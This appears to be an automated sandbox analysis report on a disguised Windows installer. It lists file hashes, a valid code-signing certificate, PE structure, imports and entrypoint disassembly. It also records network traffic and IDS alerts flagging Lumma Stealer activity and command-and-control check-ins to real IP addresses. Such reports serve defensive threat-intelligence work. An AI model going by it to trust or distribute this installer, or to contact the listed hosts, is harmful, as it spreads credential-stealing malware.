File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.866381639014143
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Magic_V_pro_setup_stable_latest_release_version_9_709.exe
File size:	3'548'416 bytes
MD5:	4f4e6dd4d4b9d96e69b7f8f97e867023
SHA1:	51db1de1d11976911dee96ed18b1fc903ea16676
SHA256:	43b9bb932501d8d186d9fd49ee5fa1a1c47283e1db898a68b5c846eb7b971aee
SHA512:	dfc58630f2fedddbbedd7a27143fd5334182882e7d124a40d9f9f38eea09802a785d7d0d71082a90f885136c57a8e65986493c97fb9b4f306a76ddc33701f904
SSDEEP:	98304:61QTsRIY+m6UVFUeY5CwAJj3aohMvl6t82B:mbRItvUIeY5CVJTaohMvot82B
TLSH:	59F50227B288A53EC4AE27354673A01058FBBAADF4177E1677F0C48CCF661C11E3A665
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2f232d67b7934633

Static PE Info

General

Entrypoint:	0x4a7ed0
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5DA1B5ED [Sat Oct 12 11:15:57 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	eb5bc6ff6263b364dfbfb78bdb48ed59

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	25/02/2025 19:15:06 25/02/2026 11:06:59
Subject Chain	CN=NOBIS LLC, O=NOBIS LLC, STREET="p Razvilka proyezd Proyektiruyemyy N5537, 4 Tsekh Kompressorn. No.1 K. 17", L=Vidnoye, S=Moscow Oblast, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow Oblast, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1105003003390, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	BD805C8B63C8B5305BBF421B7D75F321
Thumbprint SHA-1:	C10322D45BAAA43A3F8575C2FA56C9252CC98CA8
Thumbprint SHA-256:	869FFB4DCE5270739ADEFD56C4B0CB86E84241E76CD39D3F8EEAD4550206628F
Serial:	3931A71B7B628759789BA848

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2BC4h
call 00007F8BC151E17Dh
xor eax, eax
push ebp
push 004A85C2h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A857Eh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007F8BC15B227Bh
call 00007F8BC15B1DD2h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F8BC15337A8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B3714h
call 00007F8BC1518A07h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B3714h]
mov dl, 01h
mov eax, dword ptr [00423698h]
call 00007F8BC153480Fh
mov dword ptr [004B3718h], eax
xor edx, edx
push ebp
push 004A852Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F8BC15B2303h
mov dword ptr [004B3720h], eax
mov eax, dword ptr [004B3720h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F8BC15B8BBAh
mov eax, dword ptr [004B3720h]
mov edx, 00000028h
call 00007F8BC1535104h
mov edx, dword ptr [004B3720h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb6000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb4000	0xf1c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb9000	0x5acc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x35fbd0	0x2930
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb8000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb42e0	0x240	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb5000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa50e8	0xa5200	f082ee6260fd65bd4406603aefa5b38a	False	0.35601136686222556	data	6.369284753795082	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1668	0x1800	01fc0e6510748ac1fa24729bd4c8d31d	False	0.541015625	data	5.951810643537571	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x37a4	0x3800	34fa73ad8332bf3785e4314a4334a782	False	0.36063058035714285	data	5.035168539011174	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x6778	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb4000	0xf1c	0x1000	daddecfdccd86a491d85012d9e547c63	False	0.36474609375	data	4.791610915860562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb5000	0x1a4	0x200	be0581a07bd7d21a29f93f8752d3e826	False	0.345703125	data	2.7458225536678693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb6000	0x9a	0x200	c7a09d734ff63f677dfd4d18e3440fdf	False	0.2578125	data	1.881069204504408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb7000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb8000	0x5d	0x200	955f17d4899f3cf7664168fa46e1b316	False	0.189453125	data	1.3799881252217987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xb9000	0x5acc	0x5c00	63aa3c5851a8624416f1023d843c0f2e	False	0.3392917798913043	data	4.968005209574528	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xb9528	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192, 16 important colors	English	United States	0.6317567567567568
RT_ICON	0xb9650	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.5823699421965318
RT_ICON	0xb9bb8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640, 16 important colors	English	United States	0.5120967741935484
RT_ICON	0xb9ea0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5455776173285198
RT_ICON	0xba748	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.36341463414634145
RT_ICON	0xbadb0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.423773987206823
RT_STRING	0xbbc58	0x360	data			0.34375
RT_STRING	0xbbfb8	0x260	data			0.3256578947368421
RT_STRING	0xbc218	0x45c	data			0.4068100358422939
RT_STRING	0xbc674	0x40c	data			0.3754826254826255
RT_STRING	0xbca80	0x2d4	data			0.39226519337016574
RT_STRING	0xbcd54	0xb8	data			0.6467391304347826
RT_STRING	0xbce0c	0x9c	data			0.6410256410256411
RT_STRING	0xbcea8	0x374	data			0.4230769230769231
RT_STRING	0xbd21c	0x398	data			0.3358695652173913
RT_STRING	0xbd5b4	0x368	data			0.3795871559633027
RT_STRING	0xbd91c	0x2a4	data			0.4275147928994083
RT_RCDATA	0xbdbc0	0x10	data			1.5
RT_RCDATA	0xbdbd0	0x2c4	data			0.6384180790960452
RT_RCDATA	0xbde94	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0xbdec0	0x5a	data	English	United States	0.7333333333333333
RT_VERSION	0xbdf1c	0x584	data	English	United States	0.26274787535410765
RT_MANIFEST	0xbe4a0	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x453ac0
__dbk_fcall_wrapper	2	0x40d3dc
dbkFCallWrapperAddr	1	0x4b063c

Version Infos

Description	Data
Comments	This installation was built with Inno Setup.
CompanyName	Nash Norton, Inc.
FileDescription	Jeron
FileVersion	1.0.2.2
LegalCopyright
OriginalFileName
ProductName	Jeron
ProductVersion	1.0.2.2
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-08T03:14:26.697100+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49717	104.18.111.161	443	TCP
2025-03-08T03:14:29.297286+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49719	164.132.58.105	443	TCP
2025-03-08T03:14:49.607822+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49727	172.67.194.165	443	TCP
2025-03-08T03:14:50.090104+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49727	172.67.194.165	443	TCP
2025-03-08T03:14:50.090104+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49727	172.67.194.165	443	TCP
2025-03-08T03:14:51.824281+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49728	172.67.194.165	443	TCP
2025-03-08T03:15:41.810908+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49729	172.67.194.165	443	TCP
2025-03-08T03:15:42.293386+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49729	172.67.194.165	443	TCP
2025-03-08T03:15:42.293386+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49729	172.67.194.165	443	TCP
2025-03-08T03:15:44.107187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	172.67.194.165	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2025 03:14:24.904486895 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:24.904580116 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:24.904664040 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:24.907175064 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:24.907213926 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:26.697002888 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:26.697099924 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:26.702001095 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:26.702029943 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:26.702436924 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:26.745959997 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:26.773997068 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:26.820338011 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:27.348328114 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:27.348470926 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:27.348548889 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:27.350883007 CET	49717	443	192.168.2.4	104.18.111.161
Mar 8, 2025 03:14:27.350941896 CET	443	49717	104.18.111.161	192.168.2.4
Mar 8, 2025 03:14:27.391495943 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:27.391565084 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:27.391665936 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:27.392154932 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:27.392178059 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:29.297152996 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:29.297286034 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:29.330991030 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:29.331068993 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:29.331533909 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:29.355928898 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:29.400353909 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:30.111773968 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:30.111870050 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:30.112030029 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:30.115581036 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:30.115614891 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:30.115638018 CET	49719	443	192.168.2.4	164.132.58.105
Mar 8, 2025 03:14:30.115648031 CET	443	49719	164.132.58.105	192.168.2.4
Mar 8, 2025 03:14:30.413836956 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:30.413878918 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:30.413949013 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:30.414840937 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:30.414854050 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.169879913 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.169945002 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.195110083 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.195147038 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.196093082 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.196229935 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.196645975 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.240333080 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.646811008 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.646871090 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.649214983 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.649291992 CET	443	49721	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.649444103 CET	49721	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.659291029 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.659351110 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:32.659418106 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.659759998 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:32.659780979 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.441905022 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.441996098 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:34.444916010 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:34.444928885 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.445259094 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.445430040 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:34.445883036 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:34.488331079 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.919311047 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.919406891 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:34.919437885 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:34.919492006 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.008663893 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.008690119 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.008737087 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.008750916 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.008817911 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.008831978 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.008913040 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.043826103 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.043880939 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.043919086 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.043942928 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.043976068 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.043998003 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.077966928 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.078017950 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.078047037 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.078058004 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.078095913 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.078119040 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.118768930 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.118829966 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.118863106 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.118872881 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.118918896 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.148854017 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.148897886 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.148935080 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.148942947 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.148988008 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.169971943 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.170016050 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.170042038 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.170051098 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.170128107 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.170128107 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.192992926 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.193043947 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.193078995 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.193089962 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.193120003 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.193145037 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.210870981 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.210930109 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.210952997 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.210961103 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.211011887 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.211025000 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.211087942 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.227379084 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.227425098 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.227464914 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.227474928 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.227514029 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.227534056 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.240484953 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.240530968 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.240571976 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.240581036 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.240628958 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.251151085 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.251257896 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.251271009 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.251339912 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.263505936 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.263555050 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.263613939 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.263622999 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.263672113 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.273283005 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.273329020 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.273372889 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.273380995 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.273437023 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.284141064 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.284185886 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.284224033 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.284233093 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.284291029 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.296979904 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.297027111 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.297060013 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.297068119 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.297128916 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.303708076 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.303755045 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.303793907 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.303801060 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.303864002 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.314368963 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.314416885 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.314454079 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.314460993 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.314507961 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.325056076 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.325103045 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.325141907 CET	49724	443	192.168.2.4	190.92.154.206
Mar 8, 2025 03:14:35.325159073 CET	443	49724	190.92.154.206	192.168.2.4
Mar 8, 2025 03:14:35.325191021 CET	49724	443	192.168.2.4	190.92.154.206
